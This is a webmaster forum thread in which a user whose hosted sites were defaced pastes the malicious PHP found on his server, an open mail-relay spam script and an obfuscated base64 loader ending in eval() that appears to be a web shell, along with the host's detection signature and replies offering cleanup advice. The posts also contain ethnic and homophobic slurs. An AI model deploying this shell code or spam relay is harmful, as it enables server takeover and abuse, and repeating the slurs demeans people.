Sites hacked

S

shindig

New member
Jul 21, 2012
1,290
10
0
Seattle, WA
Somehow my domains hosted on bluehost got hacked by some Palestinian faggot.

2e5r2py.jpg


Some of the sites weren't even public/published, I was working on the one pictured above and just went to show a client and this shit appeared.

Looking in my the file directory on bluehost for the domain, I see they slipped an index.html file into the main directory for each of my domains.

I got this email from bluehost:
Dear customer,

This notice is to inform you that we have detected malicious code in your website files. We have compiled a list of compromised files on your account, as well as the code injected, below.

In order to maintain a secure hosting environment, we will be automatically correcting these compromised files on your account; however, please be aware that you are responsible for verifying that the content hosted within your account is secure. We strongly advise that you update your installed scripts and software, as outdated scripts and software are the most frequently used method for accessing and gaining control of a targeted account.

If you need assistance updating the software on your hosting account, please do not hesitate to contact our Support department.


The malicious code detected is similar to:

Files with the following contents or MD5SUMs, which contain malicious code:

\$default_action\s*=\s*['"]FilesMan['"]\s*
Click to expand...

My password is ridiculously complex, don't know how anyone would get it...how else would these fuckers add shit to my server? Some of the domains were registered last week...
 


I'd installed wordpress but was just using static pages. I'd disabled all the plugins. Some of the domains affected don't have wordpress installed yet there are a dozen new files added in the directory. Fuck.

This is some random php file:
<?php $HmqenXtApUBX = stripslashes($_POST['OejVxex']); $SFQsFl = stripslashes($_POST['GQrR']); $oabczZQYGw = stripslashes($_POST['bupthoehyRL']); $retu = mail(stripslashes($HmqenXtApUBX), stripslashes($SFQsFl), stripslashes($oabczZQYGw)); if($retu){echo 'dOuAfkhHe';} else {echo 'MdxXEYvzD : '.$XJaIKNNKlBfm;}


<?php
$vMZLYVQ = Array('1'=>'j', '0'=>'v', '3'=>'3', '2'=>'m', '5'=>'P', '4'=>'g', '7'=>'e', '6'=>'E', '9'=>'N', '8'=>'s', 'A'=>'F', 'C'=>'l', 'B'=>'T', 'E'=>'4', 'D'=>'w', 'G'=>'q', 'F'=>'2', 'I'=>'X', 'H'=>'O', 'K'=>'R', 'J'=>'b', 'M'=>'k', 'L'=>'V', 'O'=>'L', 'N'=>'S', 'Q'=>'H', 'P'=>'i', 'S'=>'0', 'R'=>'J', 'U'=>'B', 'T'=>'y', 'W'=>'7', 'V'=>'A', 'Y'=>'c', 'X'=>'d', 'Z'=>'o', 'a'=>'f', 'c'=>'Q', 'b'=>'a', 'e'=>'9', 'd'=>'u', 'g'=>'8', 'f'=>'t', 'i'=>'G', 'h'=>'n', 'k'=>'Y', 'j'=>'r', 'm'=>'5', 'l'=>'1', 'o'=>'x', 'n'=>'W', 'q'=>'h', 'p'=>'K', 's'=>'D', 'r'=>'6', 'u'=>'I', 't'=>'p', 'w'=>'C', 'v'=>'U', 'y'=>'Z', 'x'=>'M', 'z'=>'z');
function vFHEEL1($vJTLD3Z, $vEI3O5N){$vYRM05R = ''; for($i=0; $i < strlen($vJTLD3Z); $i++){$vYRM05R .= isset($vEI3O5N[$vJTLD3Z[$i]]) ? $vEI3O5N[$vJTLD3Z[$i]] : $vJTLD3Z[$i];}
return base64_decode($vYRM05R);}
$vGKDO72 = 'RiAlXiqaYiAzYTVeuwRq9nAPkzCCknkD9B4Tk2RMy1Rqk1YFxskE9n6mx'.
'1kSxTuWw4ZMkFe8J3u45NVPuFK29NuWwPKMynyqXnoSIFA1XiC0JPVeuwXibnoCYSlqJPYWwPKMynyqXnoSI3Lzy'.
'Leqb2AEusS4XQRlyB8pRiKCy2AlJQKakFqqYh9CXwVeuwXIbnmMJ3XzOB6T9B6hHDZpciCdbLezyIcZRFLTY2eTIF'.
'o0yTY8BCLxBwMWwMUtJ2CaYFLSpwX8JFXayIRTJ3RzRTDDpB8pciCdbLezyIcZRFl'.
'q7AeC7iL1XIKtJFmaXiCfyNY8xwMWwMUzyIKaXiCfyLe8bnltXw4DpB8pcQ9CX'.
'AefknXtkleoXneSyI9aYhLdXiCfyN4DpB8pciKCy2CdyN4hLl95IlyAvC9RBSEhOwVhxPElO16hpB8pw2'.
'C2piXCXAefknXtkleoXneSyI9ay3U1pwMtuQ8puwV4uiylJ29SbneduAXBB39'.
'SY2CDYFoqYFqCYT4MkIRTkIMtuQ8puwV4uwV4uwUTyIKlY2E4bI9akIRTkIMZRiAT'.
'Y2AmpNV/uiATY2AmIFlqYw4hLl95Y3KTbIUzJiAzbiLzRTD4RiATY2A'.
'mpNVruQ9SY2CDYFoqYFqCYT4MkIRTkIMtHDZ4uwV4acZ4uwV4RAecBl9vusS4Ll9'.
'5Y3KTbIUzJiAzbiLzpwKav6eBLwMWwPV4uwVMIS95BSfRKNVeuAXBB39SY2CDYFoqYFqCYT4M'.
'IS95BSfRKNMWwhSpw2ylJ29SbneduQXzJSo0yFCdpwM47DZ4uw'.
'V4biLqyiLTpwXuLAKcOz6dxwVSxsc4B2eSu6y0XnmMRTMWwPV4uwUMbnvZu1cD9wutHDtew4t2Xnm1XiC0JPUIvSezyIK1JF'.
'ejbnvZRi88uwKFpNUWwPV4uwVMIS95BSfRKL8MblS45NVMX18puwV4uQ9CX'.
'i90JFftyN4MbTD4RQktHDtew4ttyP4qynlDXQMZRiAlXiqaYiAzYTMtuQ8puwV4uiC2piCzYFLSpwKav6eBLA8hY'.
'iAzYTXXpNV2RPVZJnclpwKav6eBLA8hYiAzYTXXpNVe5NVMkILSbAeDkI9zpNMpuwV4uwV4uwUIvSezyIK1JFejbn'.
'vZJnclpwKavSLNLMLNnTXuLAKcISq5vlchINM8uwKqXIKZI3UqY3xtHDZpuwV4uiC2uw4qbI9zyIc'.
'ZRAesBSeONvLJJnclpwKavSLNLMLNnTXuLAKcISq5vlchINCXpNUgawVZRAesBSeONvLJJnclpwKavSLNLML'.
'NnTXuLAKcISq5vlchINCXuw6euwKqXIKZI3UqY3xtpcZ4uwV4uwV4uQXz'.
'JSo0yFCdpwMWwhSpw2ylJ29SbneduiA1XiC0JCRspwM47DZ4uwV4bnkZuvVMIlU5vlKJR3VoRlStuQ8puwV4uwV4uw'.
'VMkNVeuiATY2AmpVZ4uwV4uwV4uwV4uwVPXnmqJnvPusS+uQUZYAelJ2AfyN4tOVZ4'.
'uwV4uwV4uwV4uwVPYiqDI3yCYh9tJFEPusS+uQUZYQyCYh9tJFEZpNDpuwV4uwV4uwV4uwV4uhXzJleFyIRzbneduPVe5P'.
'UIvSeaLMLNvSC5BPDpuwV4uwV4uwV4uwV4uh9qy2LfJFKCuPVe5PUVbnmtIFXCXw4hYF'.
'A2yLefJFKCRTMpuwV4uwV4uwVtHDZ4uwV4uwV4uiL1big4YFLTbnA8bItCpwKqpB8puwV4u'.
'QS4ynozyNUWwPV4uwV4uwV4yIyqJw4MIlU5vlKJR3VoRlStHDZ4uwV4actew2C2pwUCJIUS7N4MIlU5vlKJRF6h'.
'INM4pcZ4uwV4bnkZbI9zyIcZRiKCy2AlJQKakn9SbnedpNV2RPU2Xnm1XiC0JCeC7iCzXQxZ'.
'RFA1XiC0JPY4OPVMyiL2kIL8XAeqk3KtJFEtpcZ4uwV4uwV4uwKav6eBLA8hkNXX'.
'usS4RiKCy2AlJQKakn9SbnedHDZ4uwV4ynozycZ4uwV4uwV4uwKav6eBLA8hkNXXusS4Rl9CkSCdy2ghHDttyP44unLfYQKmpwKa'.
'v6eBLA8hkNXXpNV2RPU2Xnm1XiC0JCeC7iCzXQxZRFA1XiC0JPY4OPVMIlU5vlKJRF6hINM4pcZ4uwV4kFA8JAelYFLTIFylJ2xZ'.
'RFA1XiC0JPY4OPVMIlU5vlKJRF6hINMWw2LEbIcW';
eval(vFHEEL1($vGKDO72, $vMZLYVQ));?>
Click to expand...

Even added php.ini files.
 
shindig said:
I'd installed wordpress but was just using static pages. I'd disabled all the plugins. Some of the domains affected don't have wordpress installed yet there are a dozen new files added in the directory. Fuck.

This is some random php file:


Even added php.ini files.
Click to expand...

Your usernames were left as 'admin'?
 
Well the hacker does have a point. Palestine needs to be freed from the occupation.
 
Hacker uploaded shell through one of your public WP sites and therefore had access to ALL files hosted on that cPanel account (including all of your other sites, as all of the site files are bunched up in to the same cPanel account).

There is likely a few shells hidden in random directories and you'll have to:
- Find out how the hacker uploaded their shell and fix that
- Search and delete all remaining shells

GL bro
 
MY host has two usernames/log ins, one is the admin to go to the admin, the other one is to log into wordpress, sorry to hear that man.
 
Also make sure you create a custum 404 page if you didn't have since the standard 404 with almost every host gives a hacker all the information he/she needs to bruteforcce your server.
 
Most likely the shell was uploaded through a SQLi vuln with a plugin like others said, if you check Exploit-DB there's tons of WP vulns floating around, make sure you stay up to date on public exploits and make sure you don't use any of the trash plugins you see on those sites. They also probably found your site by google dorking certain phrases to find troves of vuln sites just like yours, unless you've made enemies it most likely wasn't a commissioned attack.

But honestly security is an illusion, nothing will ever be 100%, especially so when you have to ask gay webmasters how somebody can get into your server when you have a strong password..My advice to you proceeding on is to firstly find and eliminate the shell(s) on your host, and secondly read a bit about networking and security and keep up to date with modern exploits. Knowledge is half the battle. If you're banking online the least you can do is learn how to protect your assets.
 
shindig said:
[..] I'd disabled all the plugins. [..]
Click to expand...

Just because a plugin is disabled within your Wordpress backend, doesn't mean it cannot be ran by someone. People think "disabling" it within Wordpress means disabling it's ability to run - that's incorrect. Unless you have removed execution using chmod, I can manually go to http://www.YourSite.com/wp-content/plugins/old-ass-disabled-plugin/file1234.php and run it manually or post directly to it. You have to make sure even your disabled plugins are up to date, or just completely delete them from within your plugin folder.

If a file is on your server, in the public_html directory, and has the chmod command to be executed, it can be executed - period.​
 
Keep your damn installations up to date...

Or move to real static sites.

Also, put in a good security plug in. I use several on different sites to avoid footprints... But there are plenty of good ones out there.
 
If it's just the core WP files that are affected you can export the posts in WP settings and reimport to a brand new installation. Then transferred the theme/plugins over in a zip if it's clean - would be better to just change the theme and avoid the plugins. Or at least do that on the sites you don't really care about.
 
Do you use Filezilla? Have you checked your work computer for a virus? Filezilla stores FTP usernames and passwords in plaintext and it's a popular target for viruses. The bots gets the bookmark file from Filezilla and then accesses your sites on your server.
 
you really need to research this or you will never be rid of it. If you miss even one file you're still going to have problems. Start digging. Find out everything you can about this malware. There are always tracks left behind. Find them and remove them.
 
lol at tag. agree with dmnEPC, it's a pain in the balls making sure they're gone.

the best solution i came up with was log all outbound DNS queries. your server is most useful as part of a botnet, so if they still have access, they'll be using your server to bruteforce other sites or whatever. your site shouldn't be using much outbound DNS anyway, so it should show up in logs.
 
Happened to me too on bluehost. Had 6 wordpress pages hacked. It wasn't this same guy, it was some spammer who made a bunch of phantom posts on each site with random spam and links with them. They are phantom because they don't exists in my WP admin panel to be deleted. He someone injected them into the DB's and now they show up.

Google marked my site as "hacked" in the SERPS. This is going to be a pain to fix. urgh
 
You must log in or register to reply here.
Top Bottom